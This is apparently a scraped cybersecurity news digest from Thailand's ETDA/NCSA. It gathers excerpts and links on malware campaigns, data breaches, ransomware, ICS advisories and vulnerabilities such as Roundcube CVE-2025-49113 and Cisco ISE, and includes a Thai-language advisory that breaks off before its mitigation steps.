"DanaBot is a Malware-as-a-Service (MaaS) platform that has been active since 2018. DanaBot operates on an affiliate model, where the malware developer sells access to customers who then distribute and use the malware for activities like credential theft and banking fraud. The developer is responsible for creating the malware, maintaining the command-and-control (C2) infrastructure, and providing operational support. DanaBot has been involved in several high-profile campaigns, such as a supply chain attack on popular NPM packages and a Distributed-denial-of-Service (DDoS) attack against the Ukrainian Ministry of Defense during the 2022 Russian invasion."
https://www.zscaler.com/blogs/security-research/danableed-danabot-c2-server-memory-leak-bug - New Hacker Group Uses LockBit Ransomware Variant To Target Russian Companies
"A financially motivated cybercrime group dubbed DarkGaboon has been targeting Russian companies in a series of ransomware attacks, researchers have found. The group was first identified by Russian cybersecurity firm Positive Technologies in January, but researchers have traced its operations back to 2023. Since then, DarkGaboon has targeted Russian organizations across various sectors, including banking, retail, tourism and public services. Positive Technologies was sanctioned by the U.S. in 2021 for allegedly providing IT support to Russia's civilian and military intelligence agencies."
https://therecord.media/new-hacker-group-lockbit-target-russia
Breaches/Hacks/Leaks
- Stolen Ticketmaster Data From Snowflake Attacks Briefly For Sale Again
"The Arkana Security extortion gang briefly listed over the weekend what appeared to be newly stolen Ticketmaster data but is instead the data stolen during the 2024 Snowflake data theft attacks. The extortion group posted screenshots of the allegedly stolen data, advertising over 569 GB of Ticketmaster data for sale, causing speculation that this was a new breach."
https://www.bleepingcomputer.com/news/security/stolen-ticketmaster-data-from-snowflake-attacks-briefly-for-sale-again/ - Sensata Technologies Says Personal Data Stolen By Ransomware Gang
"Sensata Technologies is warning former and current employees it suffered a data breach after concluding an investigation into an April ransomware attack. Sensata is a global industrial tech firm specializing in mission‑critical sensors, controls, and electrical protection systems. It serves the automotive, aerospace, and defense industries, among others, and has an annual revenue of over $4 billion. In April, the company filed an 8-K filing with the U.S. Securities and Exchange Commission (SEC), disclosing that it suffered a ransomware attack on Sunday, April 6, which also included data theft."
https://www.bleepingcomputer.com/news/security/sensata-technologies-says-personal-data-stolen-by-ransomware-gang/ - Grocery Wholesale Giant United Natural Foods Hit By Cyberattack
"United Natural Foods (UNFI), North America's largest publicly traded wholesale distributor, was forced to shut down some systems following a recent cyberattack. The Rhode Island-based company operates 53 distribution centers and delivers fresh and frozen products to over 30,000 locations across the United States and Canada, including supermarket chains, e-commerce providers, natural product superstores, independent retailers, and food service customers. UNFI, a primary distributor for Amazon's Whole Foods, reported $31 billion in annual revenues in August 2024, works with more than 11,000 suppliers, and has over 28,000 employees."
https://www.bleepingcomputer.com/news/security/grocery-wholesale-giant-united-natural-foods-hit-by-cyberattack/
https://therecord.media/major-food-wholesaler-cyberattack-impacting-distribution
https://www.bankinfosecurity.com/whole-foods-supplier-faces-cyberattack-disrupting-operations-a-28629
https://cyberscoop.com/united-natural-foods-whole-foods-distributor-cyberattack/
https://www.theregister.com/2025/06/09/united_natural_foods_cyber_incident/ - The Force That Surrounds Us: The AI Supply Chain From My Jedai To Canva
"UpGuard can now report that it has secured a Chroma database belonging to My Jedai, an AI chatbot company based in Russia. The database contained 341 collections of documents, where each collection could be used to guide responses for different chatbots. Many of the collections contained non-sensitive public data, but some contained private information. Most significantly, one collection contained thousands of responses to a survey of 571 participants in the Canva Creators program, including their email address, country of residence, rating for different components of the Creators program, and descriptions of their specific experiences and challenges with the program."
https://www.upguard.com/breaches/chroma-my-jedai-canva
https://hackread.com/limited-canva-creator-data-expose-ai-chatbot-database/ - Nearly 300,000 Crash Records Stolen From Texas Transportation Department
"State agencies in Texas and Illinois released warnings in recent days about data breaches affecting the sensitive information of thousands of people. Texas said hackers compromised an account at the Department of Transportation (TxDOT) and discovered unusual activity on May 12 involving its Crash Records Information System (CRIS). An investigation found that the compromised account was used to access and download almost 300,000 crash reports. Texas is legally required to maintain CRIS, which tracks all details of crashes and the people involved."
https://therecord.media/car-crash-records-stolen-texas-transportation-department
General News
- Balancing Cybersecurity And Client Experience For High-Net-Worth Clients
"In this Help Net Security interview, Renana Friedlich-Barsky, EVP and CISO at LPL Financial, discusses how threat actors are targeting high-net-worth clients and exploiting digital touchpoints in wealth management. She explains why firms must embed security from the start to protect sensitive assets and ensure seamless, secure client experiences."
https://www.helpnetsecurity.com/2025/06/09/renana-friedlich-barsky-lpl-financial-wealth-management-cybersecurity/ - CISOs, Are You Ready For Cyber Threats In Biotech?
"The threat landscape in the bioeconomy is different from what most CISOs are used to. It includes traditional risks like data breaches, but the consequences are more complex. A compromise of genomic databases, for example, does not just expose personal health data. It can also leak proprietary genetic sequences that represent years of research and investment. These are not just privacy violations; they are breaches that can cripple a business’s future R&D pipeline. One example is the breach at 23andMe, where attackers accessed genetic data of millions of users through credential stuffing."
https://www.helpnetsecurity.com/2025/06/09/cyberbiosecurity-ciso-cyber-threats/ - Enterprise SIEMs Miss 79% Of Known MITRE ATT&CK Techniques
"Using the MITRE ATT&CK framework as a baseline, organizations are generally improving year-over-year in understanding security information and event management (SIEM) detection coverage and quality, but plenty of room for improvement remains, according to CardinalOps."
https://www.helpnetsecurity.com/2025/06/09/siem-detection-coverage/
https://cardinalops.com/white-papers/2025-state-of-siem-report-download/
https://www.darkreading.com/cybersecurity-operations/siems-missing-mark-mitre-techniques - Employees Repeatedly Fall For Vendor Email Compromise Attacks
"In just 12 months, attackers attempted to steal more than $300 million via vendor email compromise (VEC), with 7% of engagements coming from employees who had engaged with a previous attack, according to Abnormal AI. Employees struggle to differentiate between legitimate messages and attacks, especially when those emails appear to come from a trusted vendor. Employees in the largest organizations, with workforces of 50,000 or more, had the highest rate of second-step engagement with VEC."
https://www.helpnetsecurity.com/2025/06/09/vendor-email-compromise-attacks-vec/ - Disrupting Malicious Uses Of AI: June 2025
"Our mission is to ensure that artificial general intelligence benefits all of humanity. We advance this mission by deploying our innovations to build AI tools that help people solve really hard problems. As we laid out in our submission to the Office of Science and Technology Policy’s U.S. AI Action Plan in March, we believe that making sure AI benefits the most people possible means enabling AI through common-sense rules aimed at protecting people from actual harms, and building democratic AI. This includes preventing the use of AI tools by authoritarian regimes to amass power and control their citizens, or to threaten or coerce other states; as well as activities such as covert influence operations (IO), child exploitation, scams, spam, and malicious cyber activity."
https://openai.com/global-affairs/disrupting-malicious-uses-of-ai-june-2025/
https://thehackernews.com/2025/06/openai-bans-chatgpt-accounts-used-by.html
https://securityaffairs.com/178797/intelligence/openai-bans-chatgpt-accounts-linked-to-russian-chinese-cyber-ops.html - Next-Gen Developers Are a Cybersecurity Powder Keg
"Media rumblings of industry disruption usually surface in the form of life-changing, convenient tech offerings that promise to add more convenience, comfort, or advancement to our lives. Companies like Amazon, OpenAI, and Uber have shaped their entire ethos around similar principles, and they are among the first disruptors that come to mind for many."
https://www.darkreading.com/application-security/next-gen-developers-cybersecurity-powder-keg - EU Launches EU-Based, Privacy-Focused DNS Resolution Service
"DNS4EU is an initiative co-funded by the European Union and supported by the European Union Agency for Cybersecurity (ENISA), though the service is expected to be commercialised, “since it has to be sustainable without operational costs from the EU after 2025.”"
https://www.helpnetsecurity.com/2025/06/09/eu-launches-eu-based-privacy-focused-dns-resolution-service/ - Chinese Hackers And User Lapses Turn Smartphones Into a ‘Mobile Security Crisis’
"Cybersecurity investigators noticed a highly unusual software crash — it was affecting a small number of smartphones belonging to people who worked in government, politics, tech and journalism. The crashes, which began late last year and carried into 2025, were the tipoff to a sophisticated cyberattack that may have allowed hackers to infiltrate a phone without a single click from the user."
https://www.securityweek.com/chinese-hackers-and-user-lapses-turn-smartphones-into-a-mobile-security-crisis/ - Spyware Maker Cuts Ties With Italy After Government Refused Audit Into Hack Of Journalist’s Phone
"The spyware manufacturer Paragon said Monday that it has ended its contract with Italy because a special government committee investigating alleged abuses there declined to let the company independently verify that Italian authorities did not hack into the phone of a well-known journalist. "The company offered both the Italian government and parliament a way to determine whether its system had been used against the journalist," Paragon said in a statement issued to the Israeli publication Haaretz. Because Italian authorities “chose not to proceed with this solution, Paragon terminated its contracts in Italy,” the company said."
https://therecord.media/paragon-spyware-maker-cuts-ties-italy-government - Kazakhstan Detains Over 140 For Allegedly Selling Citizens’ Data Via Telegram Channels
"Kazakh authorities said they busted a network that was using Telegram to illegally sell citizens’ personal data extracted from government databases. More than 140 suspects were arrested in connection with the scheme, including business owners and alleged administrators of Telegram channels used to trade the stolen information, officials said on Monday. Authorities reported that some of the extracted data was shared with debt collection agencies, several of which were searched during the operation. The government seized more than 400 computers and other electronic devices believed to have been used in the illegal activity."
https://therecord.media/kazakhstan-arrests-suspects-stolen-data-network - Roles Here? Roles There? Roles Anywhere: Exploring The Security Of AWS IAM Roles Anywhere
"As organizations depend more on applications, devices and services to interact across hybrid environments, non-human identities are becoming more common. To enable secure access for these identities within the organization, Amazon Web Services (AWS) has introduced the AWS Identity and Access Management (IAM) Roles Anywhere service that allows workloads outside of AWS to authenticate using digital certificates instead of traditional access keys."
https://unit42.paloaltonetworks.com/aws-roles-anywhere/ - DragonForce Ransomware Cartel Vs. Everybody
"The story of the DragonForce Ransomware Cartel (DFRC, DragonForce) begins somewhere, but researchers can’t agree whether it started as a hacktivist group, a distinct new group, or a little of each. In fact, the more you dig into DFRC, the more obfuscated it becomes. It’s hard to find all the cool family history details in this story, and that’s exactly how they like it."
https://blog.barracuda.com/2025/06/09/dragonforce-ransomware-cartel-vs--everybody
อ้างอิง
Electronic Transactions Development Agency(ETDA)
- Fiddleitm: Open-Source Mitmproxy Add-On Identifies Malicious Web Traffic
-
พบมัลแวร์ทำลายข้อมูล “PathWiper” โจมตีโครงสร้างพื้นฐานสำคัญในยูเครน คาดว่าเชื่อมโยงกับกลุ่ม APT ของรัสเซียโพสต์ใน Cyber Security News
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
ClickFix วิวัฒนาการกลยุทธ์ของการฟิชชิ่งที่แนบเนียนยิ่งขึ้นโพสต์ใน Cyber Security News
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
Cyber Threat Intelligence 09 June 2025โพสต์ใน Cyber Security News
Healthcare Sector
- Healthcare Organizations Are At a Turning Point With AI
"32% of healthcare executives say their organization suffered a breach in the past 12 months, and 46% say they are experiencing a higher volume of attacks, according to LevelBlue. As AI promises healthcare organizations efficiency, optimized processes, and enhanced automation, the report reveals that only 29% of healthcare executives say they are prepared for AI-powered threats despite 41% believing they will happen. 32% feel their organization is prepared for deepfake attacks, even though 49% are expecting them."
https://www.helpnetsecurity.com/2025/06/05/healthcare-ai-powered-threats/
Industrial Sector
- Hitachi Energy Relion 670, 650 Series And SAM600-IO Product
"Successful exploitation of these vulnerabilities could allow an attacker to cause memory corruption on the products."
https://www.cisa.gov/news-events/ics-advisories/icsa-25-155-02 - CyberData 011209 SIP Emergency Intercom
"Successful exploitation of these vulnerabilities could allow an attacker to disclose sensitive information, cause a denial-of-service condition, or achieve code execution."
https://www.cisa.gov/news-events/ics-advisories/icsa-25-155-01 - Turning Off The (Information) Flow: Working With The EPA To Secure Hundreds Of Exposed Water HMIs
"Many like to discuss internet-connected Industrial Control Systems (ICS) as the pinnacle of high-value targets, given that it is often the infrastructure we all rely on to live. In internet terms, “ICS” is typically used interchangeably with “Critical Infrastructure” because we tend to categorize these types of services and hosts based on the underlying protocols they run. The reality is much more nuanced than this; sure, around fifty thousand hosts may be running a well-known ICS protocol like Modbus, but that doesn’t make all of the hosts running Modbus “critical infrastructure”. For all we know, those services may just be some person’s Lego Mindstorm project connected to an Arduino via a serial adapter. To classify a host with an ICS service as critical infrastructure, one needs context regarding that service."
https://censys.com/blog/turning-off-the-information-flow-working-with-the-epa-to-secure-hundreds-of-exposed-water-hmis
https://www.securityweek.com/misconfigured-hmis-expose-us-water-systems-to-anyone-with-a-browser/
New Tooling
- Meta Open-Sources AI Tool To Automatically Classify Sensitive Documents
"Meta has released an open source AI tool called Automated Sensitive Document Classification. It was originally built for internal use and is designed to find sensitive information in documents and apply security labels automatically. The tool uses customizable classification rules and works with files that contain readable text. Once labeled, the documents can be protected from unauthorized access or excluded from AI systems that use retrieval-augmented generation (RAG)."
https://www.helpnetsecurity.com/2025/06/05/meta-open-source-automated-sensitive-document-classification-tool/
https://github.com/meta-llama/PurpleLlama/tree/main/SensitiveDocClassification
Vulnerabilities
- AI Kept 15-Year-Old Zombie Vuln Alive, But Its Time Is Drawing Near
"A security bug that surfaced fifteen years ago in a public post on GitHub has survived developers' attempts on its life. Despite multiple developer warnings about the 2010 GitHub Gist containing the path traversal vulnerability in 2012, 2014, and 2018, the flaw appeared in MDN Web Docs documentation and a Stack Overflow snippet. From there, it took up residence in large language models (LLMs) trained on the flawed examples."
https://www.theregister.com/2025/06/05/llm_kept_persistent_path_traversal_bug_alive/
https://arxiv.org/abs/2505.20186 - CISA Adds One Known Exploited Vulnerability To Catalog
"CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
CVE-2025-5419 Google Chromium V8 Out-of-Bounds Read and Write Vulnerability"
https://www.cisa.gov/news-events/alerts/2025/06/05/cisa-adds-one-known-exploited-vulnerability-catalog
https://securityaffairs.com/178678/security/u-s-cisa-google-chromium-v8-flaw-known-exploited-vulnerabilities-catalog.html - Questions Swirl Around ConnectWise Flaw Used In Attacks
"A week after ConnectWise disclosed that a threat actor had gained access to its environment and targeted customers, questions remain about the vulnerability used by the attacker, and confusion remains as to the timeline of the attacks. Last week, ConnectWise revealed that its environment had been breached by a suspected nation-state actor. "ConnectWise recently learned of suspicious activity within our environment that we believe was tied to a sophisticated nation state actor, which affected a very small number of ScreenConnect customers," the company said in a May 28 advisory."
https://www.darkreading.com/remote-workforce/questions-swirl-connectwise-flaw-attacks
Malware
- Hacker Selling Critical Roundcube Webmail Exploit As Tech Info Disclosed
"Hackers are likely starting to exploit CVE-2025-49113, a critical vulnerability in the widely used Roundcube open-source webmail application that allows remote execution. The security issue has been present in Roundcube for over a decade and impacts versions of Roundcube webmail 1.1.0 through 1.6.10. It received a patch on June 1st. It took attackers just a couple of days to reverse engineer the fix, weaponize the vulnerability, and start selling a working exploit on at least one hacker forum."
https://www.bleepingcomputer.com/news/security/hacker-selling-critical-roundcube-webmail-exploit-as-tech-info-disclosed/ - FBI: BADBOX 2.0 Android Malware Infects Millions Of Consumer Devices
"The FBI is warning that the BADBOX 2.0 malware campaign has infected over 1 million home Internet-connected devices, converting consumer electronics into residential proxies that are used for malicious activity. The BADBOX botnet is commonly found on Chinese Android-based smart TVs, streaming boxes, projectors, tablets, and other Internet of Things (IoT) devices. "The BADBOX 2.0 botnet consists of millions of infected devices and maintains numerous backdoors to proxy services that cyber criminal actors exploit by either selling or providing free access to compromised home networks to be used for various criminal activity," warns the FBI."
https://www.bleepingcomputer.com/news/security/fbi-badbox-20-android-malware-infects-millions-of-consumer-devices/
https://www.ic3.gov/PSA/2025/PSA250605 - BladedFeline: Whispering In The Dark
"In 2024, ESET researchers discovered several malicious tools in the systems used by Kurdish and Iraqi government officials. The APT group behind the attacks is BladedFeline, an Iranian threat actor that has been active since at least 2017, when it compromised officials within the Kurdistan Regional Government (KRG). This group develops malware for maintaining and expanding access within organizations in Iraq and the KRG. While this is our first blogpost covering BladedFeline, we discovered the group in 2023, after it targeted Kurdish diplomatic officials with the Shahmaran backdoor, and previously reported on its activities in ESET APT Activity reports Q4 2023-Q1 2024 and Q2 2024-Q3 2024."
https://www.welivesecurity.com/en/eset-research/bladedfeline-whispering-dark/
https://www.darkreading.com/threat-intelligence/iranian-apt-bladedfeline-hides-network-8-years
https://thehackernews.com/2025/06/iran-linked-bladedfeline-hits-iraqi-and.html
https://therecord.media/iran-linked-hackers-target-kurdish-iraq-cyber-espionage
https://www.bankinfosecurity.com/iranian-espionage-group-caught-spying-on-kurdish-officials-a-28602 - Newly Identified Wiper Malware “PathWiper” Targets Critical Infrastructure In Ukraine
"Cisco Talos observed a destructive attack on a critical infrastructure entity within Ukraine, using a previously unknown wiper we are calling “PathWiper”. The attack was instrumented via a legitimate endpoint administration framework, indicating that the attackers likely had access to the administrative console, that was then used to issue malicious commands and deploy PathWiper across connected endpoints. Talos attributes this disruptive attack and the associated wiper to a Russia-nexus advanced persistent threat (APT) actor. Our assessment is made with high confidence based on tactics, techniques and procedures (TTPs) and wiper capabilities overlapping with destructive malware previously seen targeting Ukrainian entities."
https://blog.talosintelligence.com/pathwiper-targets-ukraine/
https://www.darkreading.com/cyberattacks-data-breaches/pathwiper-attack-critical-infrastructure-ukraine - How a Malicious Excel File (CVE-2017-0199) Delivers The FormBook Payload
"FortiGuard Labs recently observed a high-severity phishing campaign targeting old version Office Application users through malicious email attachments. The emails deliver an Excel file designed to exploit the CVE-2017-0199 vulnerability, a known flaw in old version Microsoft Office's OLE (Object Linking and Embedding) functionality. The malware being spread in this campaign is FormBook, an information-stealing malware known for its ability to capture sensitive data, including login credentials, keystrokes, and clipboard information. Upon opening the malicious Excel file, the malware performs a series of operations, ultimately running the FormBook payload."
https://www.fortinet.com/blog/threat-research/how-a-malicious-excel-file-cve-2017-0199-delivers-the-formbook-payload - TTPs Of Cyber Partisans Activity Aimed At Espionage And Disruption
"Cyber Partisans is a hacktivist group that has become known back in 2020. The group is very active in the media, claiming multiple attacks on government agencies and industrial enterprises, the purpose of which is to steal confidential information and destabilize the IT infrastructure of the targeted organization. Kaspersky ICS CERT experts managed to identify the attack vector, as well as find and analyze the malware and utilities most probably used by the actors in the recent series of attacks on industrial enterprises and government agencies in Russia and Belarus."
https://ics-cert.kaspersky.com/publications/reports/2025/06/05/ttps-of-cyber-partisans-activity-aimed-at-espionage-and-disruption/ - Decoding ‘ClickFix’: Lessons From The Latest Browser-Based Phish
"ClickFix is a social engineering attack that tricks users into running malicious commands on their own devices – all under the guise of a routine security check. Disguised as something familiar, like a Cloudflare CAPTCHA, it convinces users to copy and paste dangerous code without realizing the risk. We’ll break down how ClickFix works, examine a real-world example, and explore why this surprisingly simple tactic remains effective."
https://slashnext.com/blog/decoding-clickfix-lessons-from-the-latest-browser-based-phish/
https://www.securityweek.com/clickfix-attack-exploits-fake-cloudflare-turnstile-to-deliver-malware/ - Unmasking Insecure HTTP Data Leaks In Popular Chrome Extensions
"Many users assume that popular Chrome extensions adhere to strong security practices, especially when the extensions themselves promise functionality related to privacy, ranking analytics, or convenient new tab features. However, recent findings show that several widely used extensions—SEMRush Rank, PI Rank, MSN New Tab/Homepage, DualSafe Password Manager, and Browsec VPN—unintentionally transmit sensitive data over simple HTTP. By doing so, they expose browsing domains, machine IDs, operating system details, usage analytics, and even uninstall information, in plaintext. Because the traffic is unencrypted, a Man-in-the-Middle (MITM) attacker on the same network can intercept and, in some cases, even modify this data, leading to far more dangerous scenarios than simple eavesdropping."
https://www.security.com/threat-intelligence/chrome-extension-leaks
https://thehackernews.com/2025/06/popular-chrome-extensions-leak-api-keys.html - IBM X-Force Threat Analysis: DCRat Presence Growing In Latin America
"In early May 2025, IBM X-Force observed Hive0131 conducting email campaigns targeting users in Colombia with electronic notifications of criminal proceedings, purporting to be from The Judiciary of Colombia. Hive0131 is a financially motivated group likely originating from South America that routinely conducts campaigns largely in Latin America (LATAM) to deliver a wide array of commodity payloads. The current campaigns imitate official correspondence and contain either an embedded link or a PDF lure with an embedded link. Clicking on the embedded link will initiate the infection chain to execute the banking trojan "DCRat" in memory."
https://www.ibm.com/think/x-force/dcrat-presence-growing-in-latin-america
Breaches/Hacks/Leaks
- Over 3 Million Records, Including PII Exposed In App-Building Platform Data Breach
"Cybersecurity Researcher, Jeremiah Fowler, discovered and reported to vpnMentor about an unencrypted and non-password-protected database that contained 3,637,107 records that presumably belong to a no-coding app-building platform."
https://www.vpnmentor.com/news/report-passionapps-breach/
https://hackread.com/unsecured-database-exposes-passion-io-creators-data/
General News
- The Cloud Security Crisis No One’s Talking About
"Security teams are overwhelmed by a flood of alerts, most of which lack the context needed to accurately assess and espond to threats, according to ARMO. Respondents report receiving an average of 4,080 security alerts per month – or 136 alerts per day – related to potential cloud-based attacks, with 61% handling between 1,001 and 5,000 alerts monthy. Yet despite this deluge, the average number of true security incidents per year is just 7, meaning it takes an average of 6,994 alerts to uncover one bona fide incident."
https://www.helpnetsecurity.com/2025/06/05/cloud-threats-detection/ - Google Survey Shows Americans Are Changing How They Fight Scams
"If it seems like scams are popping up everywhere lately, you’re not wrong. A new survey from Google shows most Americans feel the same, and they’re starting to change how they handle things online because of it. But different age groups are responding in different ways, and the tools people trust to stay safe vary more than you might expect."
https://www.helpnetsecurity.com/2025/06/05/google-survey-fight-scams/ - China Accuses Taiwan Of Running Five Feeble APT Gangs, With US Help
"Beijing complains it’s under relentless attack by the equivalent of an ant trying to shake a tree China’s National Computer Virus Emergency Response Center on Thursday published a report in which it claims Taiwan targeted it with a years-long but feeble cyber offensive, backed by the USA. In a report [PDF] titled “Operation Futile: Investigation report on Cyberattacks launched by ICEFCOM of Taiwan and its affiliated [advanced persistent threat] APT actors”"
https://www.theregister.com/2025/06/05/china_taiwan_us_apt_report/
https://www.cverc.org.cn/head/zhaiyao/Investigation_report_on_Cyberattacks_launched_by_Taiwan_ICEFCOM_EN.pdf
<https://www.securityweek.com/china-issues-warrants-for-alleged-taiwanese-hackers-and-bans-a-business-for-pro-* **independence-links/> - US Offers $10M For Tips On State Hackers Tied To RedLine Malware**
"The U.S. Department of State has announced a reward of up to $10 million for any information on government-sponsored hackers with ties to the RedLine infostealer malware operation and its suspected creator, Russian national Maxim Alexandrovich Rudometov. The same bounty covers leads on state hackers' use of this malware in cyber operations targeting critical infrastructure organizations in the United States."
https://www.bleepingcomputer.com/news/security/us-offers-10m-for-tips-on-state-hackers-tied-to-redline-malware/
https://rewardsforjustice.net/rewards/maxim-alexandrovich-rudometov-redline/
https://www.theregister.com/2025/06/05/rewards_for_justice_maxim_rudometov/ - ViLE Gang Members Sentenced For DEA Portal Breach, Extortion
"Two members of a group of cybercriminals named ViLE were sentenced this week for hacking into a federal law enforcement web portal in an extortion scheme. According to court documents, ViLE specializes in obtaining personal information about targets to harass, threaten, or extort them, a practice known as "doxing." To collect sensitive information on their victims, they use methods such as tricking customer service employees, submitting fraudulent legal requests to social media companies, bribing corporate insiders, and searching public and private online databases."
https://www.bleepingcomputer.com/news/security/vile-gang-members-sentenced-for-breaching-law-enforcement-portal/
https://www.securityweek.com/men-who-hacked-law-enforcement-database-for-doxing-sentenced-to-prison/ - SecOps Need To Tackle AI Hallucinations To Improve Accuracy
"While Artificial Intelligence (AI) benefits security operations (SecOps) by speeding up threat detection and response processes, hallucinations can generate false alerts and lead teams on a wild goose chase. AI hallucinations, which largely affect large language models (LLMs), produce incorrect, misleading, or biased information. However, unsuspecting users may accept those responses as legitimate and confidently make decisions based on them. Many examples of AI hallucinations exist, such as made-up law cases in legal filings, fictional book titles, and non-existent research studies. AI experts have repeatedly warned about the effect hallucinations can have, whether they are average users running casual ChatGPT queries or skilled developers using AI to write code."
https://www.darkreading.com/vulnerabilities-threats/secops-tackle-ai-hallucinations-improve-accuracy - Sticky Fingers In The Cookie Jar: Research Reveals The Risks Of Web Cookies
"Most of us barely pause before clicking away the cookie consent banner. It’s a routine, a forgettable part of using the internet, meant to make our online lives easier. After all, the internet is built on convenience. But that convenience has a cost, and that cost is often paid in the form of your data. In our latest study, researchers from NordStellar, a threat exposure management platform, analyzed a set of 93.7 billion cookies circulating on the dark web to uncover how they were stolen and what risks they pose. Read on and learn what that means for your privacy and security and what you can do to protect yourself."
https://nordvpn.com/blog/cookies-research/
https://hackread.com/nearly-94-billion-stolen-cookies-on-dark-web/ - #Infosec2025: Cybersecurity Lessons From Maersk’s Former CISO
"The 2017 ransomware attack on shipping company A P Moller Maersk marked a turning point for the cybersecurity industry, according to its former CISO Adam Banks. The attack is estimated to have cost Maersk $700m, excluding any revenue losses. Following the attack, it was three months before the business was fully back online, Banks told an audience at Infosecurity Europe 2025. But, he said, it could well have been worse. The $700m figure was, Banks said, the cost of the attack and the recovery. A stroke of luck, in the form of a power cut in Lagos, cut the firm’s recovery time by as much as four weeks."
https://www.infosecurity-magazine.com/news/infosec2025-lessons-maersk-ciso/ - #Infosec2025: Ransomware Victims Urged To Engage To Take Back Control
"Opening lines of communication with ransomware actors is the best way to deliver a positive outcome from an event that will be “the worst day of the IT team’s lives,” a leading negotiator has claimed. Dan Saunders, director of incident response EMEA at Kivu Consulting, revealed that just 30% of the firm’s negotiations with threat actors over the past year have actually led to the victim paying. “There’s a common misconception around engaging threat actors and that is if ‘we’re going to engage them, we’re going to reach a financial settlement.’ But that is not the case,” he said."
https://www.infosecurity-magazine.com/news/infosec2025-ransomware-victims/ - #Infosec2025: Know Your Audience To Make An Impact, CISOs Tell Their Peers
"Security leaders must focus and adapt their message to their audience if they are to successfully use risk management to tame a chaotic cyber landscape, a panel of CISOs has argued. On the final day of Infosecurity Europe, security bosses from across LexisNexis and RX Global discussed how CISOs play a vital role as business enablers, and “translators” of risk for senior leadership. This role has added importance given a landscape in which AI-driven threats, insider risk, growing business demands and fast-evolving technology proliferate."
https://www.infosecurity-magazine.com/news/infosec2025-know-your-audience/ - #Infosec2025: Threat Actors Weaponizing Hardware Devices To Exploit Fortified Environments
"Threat actors are weaponizing legitimate hardware devices to compromise even the most fortified targets, warned Bentsi Benatar, CMO and Co-Founder of Sepio during a talk at Infosecurity Europe 2025. Despite a lack of reporting of such incidents, this approach is being utilized by sophisticated nation-state and financially motivated attackers to target sensitive targets such as banks and energy carriers."
https://www.infosecurity-magazine.com/news/threat-actors-weaponizing-hardware/ - #Infosec2025: Defenders And Attackers Are Locked In An AI Arms Race
"Malicious actors are using AI tools to fine-tune cyber-attacks, even as governments race to encourage AI investment. National programs to bolster AI expertise and R&D should be seen in the context of the growing use of AI tools by criminal hackers, advised Brett Taylor, UK sales engineering director at SentinelOne, in his talk at Infosecurity Europe 2025. Just as enterprises and public-sector bodies are looking to AI to improve productivity and drive economic growth, so criminal groups are using AI-based tools to develop malware and find vulnerabilities. Additionally, hackers are actively looking for any weak spots in AI deployments."
https://www.infosecurity-magazine.com/news/infosec2025-arms-race-ai/ - #Infosec2025: Seven Steps To Building a Mature Vulnerability Management Program
"For the past two years, cybersecurity teams have been facing an explosion of publicly reported vulnerabilities in software and hardware products, making it increasingly challenging to prioritize patch management. Speaking at Infosecurity Europe 2025, Jon Ridyard, Senior Sales Engineer at Axonius, proposed seven best practices for building mature vulnerability management processes and avoiding burnout."
https://www.infosecurity-magazine.com/news/infosec2025-seven-steps/ - #Infosec2025: Securing Endpoints Is Still Vital Amid Changing Threats
"Endpoint devices, including PCs, mobile phones and connected IoT equipment continue to pose security risks, even as malicious actors ramp up their attacks on other areas of enterprise technology. Endpoint security might be less of a focus for CISOs struggling with a growing attack surface and increasingly sophisticated malicious actors harnessing AI tools and weaknesses in supply chain security. However, endpoints and networks remain critical layers of IT infrastructure that organizations still need to protect."
https://www.infosecurity-magazine.com/news/infosec2025-securing-endpoints/ - IT Threat Evolution In Q1 2025
"According to Kaspersky Security Network, in the first quarter of 2025: A total of 12 million attacks on mobile devices involving malware, adware, or unwanted apps were blocked. Trojans, the most common mobile threat, accounted for 39.56% of total detected threats. More than 180,000 malicious and potentially unwanted installation packages were detected, which included: 49,273 packages related to mobile bankers and 1520 mobile ransomware Trojans."
https://securelist.com/malware-report-q1-2025-mobile-statistics/116676/
https://securelist.com/malware-report-q1-2025-pc-iot-statistics/116686/
อ้างอิง
Electronic Transactions Development Agency(ETDA)
- Healthcare Organizations Are At a Turning Point With AI
-
ช่องโหว่ร้ายแรงใน Cisco ISEโพสต์ใน Cyber Security News
เมื่อวันที่ 6 มิถุนายน 2568 Cyber Security Agency of Singapore (CSA)ได้เผยแพร่เกี่ยวกับ Cisco ได้ออกอัปเดตความปลอดภัยเพื่อแก้ไขช่องโหว่ร้ายแรง (CVE-2025-20286) ในระบบ Identity Services Engine (ISE)
ซึ่งช่องโหว่นี้ถูกจัดให้อยู่ในระดับร้ายแรง โดยมีคะแนน CVSSv3.1 9.9 และมีรายงานว่ามีโค้ดสำหรับการโจมตีช่องโหว่นี้ (proof-of-concept exploit) เผยแพร่ออกมาแล้วผลกระทบ
หากช่องโหว่นี้ถูกโจมตีโดยสำเร็จ ผู้ไม่หวังดีที่ไม่ผ่านการยืนยันตัวตนและอยู่ระยะไกล อาจสามารถ:- เข้าถึงข้อมูลสำคัญ
- ดำเนินการระดับผู้ดูแลระบบบางส่วน
- แก้ไขการตั้งค่าระบบ
- หรือก่อกวนบริการภายในระบบที่ได้รับผลกระทบ
ผลิตภัณฑ์ที่ได้รับผลกระทบ
ช่องโหว่นี้มีผลกับ Cisco ISE ที่กำหนดค่าด้วยค่ามาตรฐาน (default configuration) บนแพลตฟอร์มคลาวด์ต่อไปนี้:- AWS: Cisco ISE เวอร์ชัน 3.1, 3.2, 3.3 และ 3.4
- Azure: Cisco ISE เวอร์ชัน 3.2, 3.3 และ 3.4
- OCI (Oracle Cloud Infrastructure): Cisco ISE เวอร์ชัน 3.2, 3.3 และ 3.4
แนวทางการแก้ไข
แนะนำให้ผู้ใช้งานและผู้ดูแลระบบที่ได้รับผลกระทบ ดำเนินการอัปเดตเป็นเวอร์ชันล่าสุดโดยทันทีหากไม่สามารถอัปเดตได้ในทันที ควรดำเนินมาตรการบรรเทาดังนี้:
